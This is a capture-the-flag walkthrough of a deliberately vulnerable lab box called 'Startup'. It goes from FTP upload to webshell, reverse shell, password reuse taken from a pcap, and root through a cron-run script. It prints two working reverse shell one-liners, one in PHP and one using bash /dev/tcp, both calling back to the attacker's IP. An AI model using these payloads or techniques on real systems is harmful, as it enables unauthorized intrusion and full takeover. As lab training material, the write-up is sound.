# Startup
**We are Spice Hut,** a new startup company that just made it big! We offer a variety of spices and club sandwiches (in case you get hungry), but that is not why you are here. To be truthful, we aren't sure if our developers know what they are doing and our security concerns are rising. We ask that you perform a thorough penetration test and try to own root. Good luck!

# Tasks
* Identify secret spicy soup recipe
* user.txt
* root.txt

# Vulnerabilities
* FTP and HTTP linked and unfiltered upload
* Not changing password after a breach
* Read/Write Permissions



# Recon
## NMAP
```nmap
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
```
Let's check out the website first.
No interesting comments and no robots.txt
Let's run nikto and ffuf on the site.

## FTP
In the mean time we can try to login into FTP with anonymous login.
```bash
$ftp 10.10.156.183
```
And we can login into it, let's see what files we have.
```bash
drwxrwxrwx    2 65534    65534        4096 Nov 12  2020 ftp
-rw-r--r--    1 0        0          251631 Nov 12  2020 .test.log
-rw-r--r--    1 0        0          251631 Nov 12  2020 important.jpg
-rw-r--r--    1 0        0             208 Nov 12  2020 notice.txt
```
notice.txt doesn't seem to interesting, checking out the ftp file it's empty, and important.jpg is just a pic of Among us, but since it's a jpg and named important, it might be important. Also a log file is very good stuff for us.

## FFUF
And checking out our results on ffuf.
There is only 1 directory available to us which is /files
Let's check that out.

# Foothold

And it looks similar to the directory in the FTP session, so my guess is that if we upload stuff from FTP, it'll show up in the browser.

To test our concept let's upload a reverse shell in the ftp folder.
```bash
$ put shell.php
```
After that let's check out the file directory in the website, and sure enough our shell.php is there, but it doesn't work. Let's upload a webshell so that we can have command execution.

I'm using a webshell from drag0s
https://github.com/drag0s/php-webshell

So let's upload that webshell in the ftp server and navigate to the files.
```bash
$ put webshell.php
```
Checking it out and it works! To prove our concept we can try to ping our box and we'll get a ping back.

Now let's insert some malicious payloads to execute.
```php
php -r '$sock=fsockopen("10.17.1.163",9001);exec("sh <&3 >&3 2>&3");'
```

And we're in.

# Privesc
Now we're user www-data, let's see around.
There's a directory called incidents which isn't a normal linux folder, let's check it out
```bash
$ ls
suspicious.pcapng
```
Looks like it's a pcap file. Let's check that out. Looks like there was another attack here before us, he also did the same as us.
But what unusual thing he's doing is that he's entering a password www-data? Usually www-data doesn't have a password or sudo privileges or even a shell.
```bash
  

www-data@startup:/home$ sudo -l

sudo -l

[sudo] password for www-data: c4ntg3t3n0ughsp1c3

  

Sorry, try again.

[sudo] password for www-data:

  

Sorry, try again.

[sudo] password for www-data: c4ntg3t3n0ughsp1c3
```
Let's try this password with the home user.
```bash
$ su lennie
```
And it works! And we'll find user.txt in the home directory and the spicy soup recipe is in the / directory.
Now we just need to escalate to root.
There is a scripts folder though in our home, let's check that out.
```bash
-rwxr-xr-x 1 root root 77 Nov 12  2020 planner.sh
```
No write permissions so let's just see what it does.
```bash
#!/bin/bash
echo $LIST > /home/lennie/scripts/startup_list.txt
/etc/print.sh
```
So it echos $LIST and calls print.sh
Let's check out /etc/print.sh now.
```bash
-rwx------ 1 lennie lennie 67 Aug  2 12:20 /etc/print.sh
```
We own that file and we can write to it, sweet.
Let's just put a reverse shell to see what happens.
```bash
sh -i >& /dev/tcp/10.17.1.163/9001 0>&1
```
Now let's run planner.sh and see what happens.
Ah shoot, we still are user lennie, it is because /etc/print.sh is running as lennie and not root even though planner.sh is root.

But it's a bit weird since planner.sh is owned by root so he probably runs it, but checking out linpeas output it doesn't show. Let's check out process using pspy64.
After a minute or two, I stand corrected!
```bash
2021/08/02 12:48:01 CMD: UID=0    PID=20229  | /bin/bash /home/lennie/scripts/planner.sh 
2021/08/02 12:48:01 CMD: UID=0    PID=20228  | /bin/bash /home/lennie/scripts/planner.sh 
2021/08/02 12:48:01 CMD: UID=0    PID=20227  | /bin/sh -c /home/lennie/scripts/planner.sh 
2021/08/02 12:48:01 CMD: UID=0    PID=20226  | /usr/sbin/CRON -f 
2021/08/02 12:48:01 CMD: UID=0    PID=20230  | /bin/bash /etc/print.sh 
```
UID 0 refers to root and it is being ran! So let's just listen onto the port.

And we got root!
Now let's grab that root.txt!










